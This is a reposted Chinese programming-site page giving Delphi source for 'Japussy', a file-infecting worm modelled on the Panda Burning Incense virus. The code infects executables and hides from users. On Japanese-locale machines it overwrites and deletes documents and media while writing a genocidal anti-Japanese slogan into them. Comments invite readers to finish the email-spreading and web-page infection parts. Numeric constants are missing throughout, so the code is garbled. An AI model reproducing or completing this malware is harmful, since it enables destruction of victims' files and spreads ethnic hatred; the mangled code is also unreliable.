熱點推薦:
您现在的位置: 電腦知識網 >> 編程 >> Delphi編程 >> 正文

Delphi版模仿熊貓燒香病毒核心源碼

2013-11-12 23:34:39  來源: Delphi編程 
WordWRAP: breakword bgColor=#fff>以下是引用片段

  program Japussy;
uses
  Windows SysUtils Classes Graphics ShellAPI{ ReGIStry};
const
  HeaderSize = ;                  //病毒體的大小
  IconOffset = $EB;                //PE文件主圖標的偏移量
 
  //在我的Delphi SP上面編譯得到的大小其它版本的Delphi可能不同
  //查找的十六進制字符串可以找到主圖標的偏移量
 
{
  HeaderSize = ;                  //Upx壓縮過病毒體的大小
  IconOffset = $BC;                  //Upx壓縮過PE文件主圖標的偏移量
 
  //Upx W 用法: upx Japussyexe
}
  IconSize  = $E;                  //PE文件主圖標的大小字節
  IconTail  = IconOffset + IconSize;  //PE文件主圖標的尾部
  ID        = $;              //感染標記
 
  //垃圾碼以備寫入
  Catchword = If a race need to be killed out it must be Yamato +
              If a country need to be destroyed it must be Japan! +
              *** WJapussyWormA ***;
{$R *RES}
function RegisterServiceProcess(dwProcessID dwType: Integer): Integer;
  stdcall; external Kerneldll; //函數聲明
var
  TmpFile: string;
  Si:      STARTUPINFO;
  Pi:      PROCESS_INFORMATION;
  IsJap:  Boolean = False; //日文操作系統標記
{ 判斷是否為Winx }
function IsWinx: Boolean;
var
  Ver: TOSVersionInfo;
begin
  Result := False;
  VerdwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
    Exit;
  if (VerdwPlatformID = VER_PLATFORM_WIN_WINDOWS) then //Winx
    Result := True;
end;
{ 在流之間復制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  dStartPos: Integer; Count: Integer);
var
  sCurPos dCurPos: Integer;
begin
  sCurPos := SrcPosition;
  dCurPos := DstPosition;
  SrcSeek(sStartPos );
  DstSeek(dStartPos );
  DstCopyFrom(Src Count);
  SrcSeek(sCurPos );
  DstSeek(dCurPos );
end;
{ 將宿主文件從已感染的PE文件中分離出來以備使用 }
procedure ExtractFile(FileName: string);
var
  sStream dStream: TFileStream;
begin
  try
    sStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone);
    try
      dStream := TFileStreamCreate(FileName fmCreate);
      try
        sStreamSeek(HeaderSize ); //跳過頭部的病毒部分
        dStreamCopyFrom(sStream sStreamSize HeaderSize);
      finally
        dStreamFree;
      end;
    finally
      sStreamFree;
    end;
  except
  end;
end;
{ 填充STARTUPINFO結構 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  Sicb := SizeOf(Si);
  SilpReserved := nil;
  SilpDesktop := nil;
  SilpTitle := nil;
  SidwFlags := STARTF_USESHOWWINDOW;
  SiwShowWindow := State;
  SicbReserved := ;
  SilpReserved := nil;
end;
{ 發帶毒郵件 }
procedure SendMail;
begin
  //哪位仁兄願意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
  HdrStream SrcStream: TFileStream;
  IcoStream DstStream: TMemoryStream;
  iID: LongInt;
  aIcon: TIcon;
  Infected IsPE: Boolean;
  i: Integer;
  Buf: array[] of Char;
begin
  try //出錯則文件正在被使用退出
    if CompareText(FileName JAPUSSYEXE) = then //是自己則不感染
      Exit;
    Infected := False;
    IsPE    := False;
    SrcStream := TFileStreamCreate(FileName fmOpenRead);
    try
      for i := to $ do //檢查PE文件頭
      begin
        SrcStreamSeek(i soFromBeginning);
        SrcStreamRead(Buf );
        if (Buf[] = #) and (Buf[] = #) then //PE標記
        begin
          IsPE := True; //是PE文件
          Break;
        end;
      end;
// 本文轉自 C++Builder 研究 ;d=ladj
      SrcStreamSeek( soFromEnd); //檢查感染標記
      SrcStreamRead(iID );
      if (iID = ID) or (SrcStreamSize < ) then //太小的文件不感染
        Infected := True;
    finally
      SrcStreamFree;
    end;
    if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
      Exit;
    IcoStream := TMemoryStreamCreate;
    DstStream := TMemoryStreamCreate;
    try
      aIcon := TIconCreate;
      try
        //得到被感染文件的主圖標(字節)存入流
        aIconReleaseHandle;
        aIconHandle := ExtractIcon(HInstance PChar(FileName) );
        aIconSaveToStream(IcoStream);
      finally
        aIconFree;
      end;
      SrcStream := TFileStreamCreate(FileName fmOpenRead);
      //頭文件
      HdrStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone);
      try
        //寫入病毒體主圖標之前的數據
        CopyStream(HdrStream DstStream IconOffset);
        //寫入目前程序的主圖標
        CopyStream(IcoStream DstStream IconOffset IconSize);
        //寫入病毒體主圖標到病毒體尾部之間的數據
        CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail);
        //寫入宿主程序
        CopyStream(SrcStream DstStream HeaderSize SrcStreamSize);
        //寫入已感染的標記
        DstStreamSeek( );
        iID := $;
        DstStreamWrite(iID );
      finally
        HdrStreamFree;
      end;
    finally
      SrcStreamFree;
      IcoStreamFree;
      DstStreamSaveToFile(FileName); //替換宿主文件
      DstStreamFree;
    end;
  except;
  end;
end;

  { 將目標文件寫入垃圾碼後刪除 }
procedure SmashFile(FileName: string);
var
  FileHandle: Integer;
  i Size Mass Max Len: Integer;
begin
  try
    SetFileAttributes(PChar(FileName) ); //去掉只讀屬性
    FileHandle := FileOpen(FileName fmOpenWrite); //打開文件
    try
      Size := GetFileSize(FileHandle nil); //文件大小
      i := ;
      Randomize;
      Max := Random(); //寫入垃圾碼的隨機次數
      if Max < then
        Max := ;
      Mass := Size div Max; //每個間隔塊的大小
      Len := Length(Catchword);
      while i < Max do
      begin
        FileSeek(FileHandle i * Mass ); //定位
        //寫入垃圾碼將文件徹底破壞掉
        FileWrite(FileHandle Catchword Len);
        Inc(i);
      end;
    finally
      FileClose(FileHandle); //關閉文件
    end;
    DeleteFile(PChar(FileName)); //刪除之
  except
  end;
end;
{ 獲得可寫的驅動器列表 }
function GetDrives: string;
var
  DiskType: Word;
  D: Char;
  Str: string;
  i: Integer;
begin
  for i := to do //遍歷個字母
  begin
    D := Chr(i + );
    Str := D + :;
    DiskType := GetDriveType(PChar(Str));
    //得到本地磁盤和網絡盤
    if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
      Result := Result + D;
  end;
end;
{ 遍歷目錄感染和摧毀文件 }
procedure LoopFiles(Path Mask: string);
var
  i Count: Integer;
  Fn Ext: string;
  SubDir: TStrings;
  SearchRec: TSearchRec;
  Msg: TMsg;
  function IsValidDir(SearchRec: TSearchRec): Integer;
  begin
    if (SearchRecAttr <> ) and  (SearchRecName <> ) and
      (SearchRecName <> ) then
      Result := //不是目錄
    else if (SearchRecAttr = ) and  (SearchRecName <> ) and
      (SearchRecName <> ) then
        Result := //不是根目錄
    else Result := ; //是根目錄
  end;
begin
  if (FindFirst(Path + Mask faAnyFile SearchRec) = ) then
  begin
    repeat
      PeekMessage(Msg PM_REMOVE); //調整消息隊列避免引起懷疑
      if IsValidDir(SearchRec) = then
      begin
        Fn := Path + SearchRecName;
        Ext := UpperCase(ExtractFileExt(Fn));
        if (Ext = EXE) or (Ext = SCR) then
        begin
          InfectOneFile(Fn); //感染可執行文件       
        end
        else if (Ext = HTM) or (Ext = HTML) or (Ext = ASP) then
        begin
          //感染HTML和ASP文件將Base編碼後的病毒寫入
          //感染浏覽此網頁的所有用戶
          //哪位大兄弟願意完成之?
        end
        else if Ext = WAB then //OutLook地址簿文件
        begin
          //獲取Outlook郵件地址
        end
        else if Ext = ADC then //Foxmail地址自動完成文件
        begin
          //獲取Foxmail郵件地址
        end
        else if Ext = IND then //Foxmail地址簿文件
        begin
          //獲取Foxmail郵件地址
        end
        else
        begin
          if IsJap then //是倭文操作系統
          begin
            if (Ext = DOC) or (Ext = XLS) or (Ext = MDB) or
              (Ext = MP) or (Ext = RM) or (Ext = RA) or
              (Ext = WMA) or (Ext = ZIP) or (Ext = RAR) or
              (Ext = MPEG) or (Ext = ASF) or (Ext = JPG) or
              (Ext = JPEG) or (Ext = GIF) or (Ext = SWF) or
              (Ext = PDF) or (Ext = CHM) or (Ext = AVI) then
                SmashFile(Fn); //摧毀文件
          end;
        end;
      end;
      //感染或刪除一個文件後睡眠毫秒避免CPU占用率過高引起懷疑
      Sleep();
    until (FindNext(SearchRec) <> );
  end;
  FindClose(SearchRec);
  SubDir := TStringListCreate;
  if (FindFirst(Path + ** faDirectory SearchRec) = ) then
  begin
    repeat
      if IsValidDir(SearchRec) = then
        SubDirAdd(SearchRecName);
    until (FindNext(SearchRec) <> );
    end;
  FindClose(SearchRec);
  Count := SubDirCount ;
  for i := to Count do
    LoopFiles(Path + SubDirStrings[i] + Mask);
  FreeAndNil(SubDir);
end;
{ 遍歷磁盤上所有的文件 }
procedure InfectFiles;
var
  DriverList: string;
  i Len: Integer;
begin
  if GetACP = then //日文操作系統
    IsJap := True; //去死吧!
  DriverList := GetDrives; //得到可寫的磁盤列表
  Len := Length(DriverList);
  while True do //死循環
  begin
    for i := Len downto do //遍歷每個磁盤驅動器
      LoopFiles(DriverList[i] + : **); //感染之
    SendMail; //發帶毒郵件
    Sleep( * * ); //睡眠分鐘
  end;
end;
{ 主程序開始 }
begin
  if IsWinx then //是Winx
    RegisterServiceProcess(GetCurrentProcessID ) //注冊為服務進程
  else //WinNT
  begin
    //遠程線程映射到Explorer進程
    //哪位兄台願意完成之?
  end;
  //如果是原始病毒體自己
  if CompareText(ExtractFileName(ParamStr()) Japussyexe) = then
    InfectFiles //感染和發郵件
  else //已寄生於宿主程序上了開始工作
  begin
    TmpFile := ParamStr(); //創建臨時文件
    Delete(TmpFile Length(TmpFile) );
    TmpFile := TmpFile + # + exe; //真正的宿主文件多一個空格
    ExtractFile(TmpFile); //分離之
    FillStartupInfo(Si SW_SHOWDEFAULT);
    CreateProcess(PChar(TmpFile) PChar(TmpFile) nil nil True
      nil Si Pi); //創建新進程運行之
    InfectFiles; //感染和發郵件
  end;
end


From:http://tw.wingwit.com/Article/program/Delphi/201311/11123.html
    推薦文章
    Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.